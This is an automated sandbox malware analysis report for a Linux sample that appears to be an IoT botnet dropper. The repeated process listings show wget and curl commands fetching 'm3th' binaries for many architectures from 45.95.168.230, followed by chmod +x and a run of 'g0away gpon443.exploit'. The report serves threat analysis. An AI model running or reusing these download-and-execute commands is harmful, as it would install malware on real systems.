Malware Analysis Report

2025-01-23 14:02

Sample ID 240823-fkkfwswelb
Target ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118
SHA256 eddc309883367d0560b940cf5019eb881112f560a336e048a17706a3f42015fc
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

eddc309883367d0560b940cf5019eb881112f560a336e048a17706a3f42015fc

Threat Level: Shows suspicious behavior

The file ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-23 04:55

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-23 04:55

Reported

2024-08-23 04:58

Platform

debian9-mipsbe-20240418-en

Max time kernel

79s

Max time network

80s

Command Line

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/g0away /tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 N/A

Processes

/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-07299380d95e44f38e896cf6730821c0-systemd-timedated.service-B1BgAC]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-07299380d95e44f38e896cf6730821c0-systemd-timedated.service-B1BgAC]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-07299380d95e44f38e896cf6730821c0-systemd-timedated.service-B1BgAC]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-07299380d95e44f38e896cf6730821c0-systemd-timedated.service-B1BgAC]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-23 04:55

Reported

2024-08-23 04:58

Platform

debian9-mipsel-20240226-en

Max time kernel

82s

Max time network

86s

Command Line

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/g0away /tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 N/A

Processes

/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hk702E]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hk702E]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hk702E]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-hk702E]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon443.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-23 04:55

Reported

2024-08-23 04:58

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

79s

Max time network

129s

Command Line

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/g0away /tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 N/A

Processes

/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118

[/tmp/ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-Y6dZLm]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-Y6dZLm]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-Y6dZLm]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-Y6dZLm]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x ba6f835f0ed903262d9eb7232d20606a_JaffaCakes118 config-err-gSYeSF g0away netplan_escgt653 snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c]

/tmp/g0away

[./g0away gpon443.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

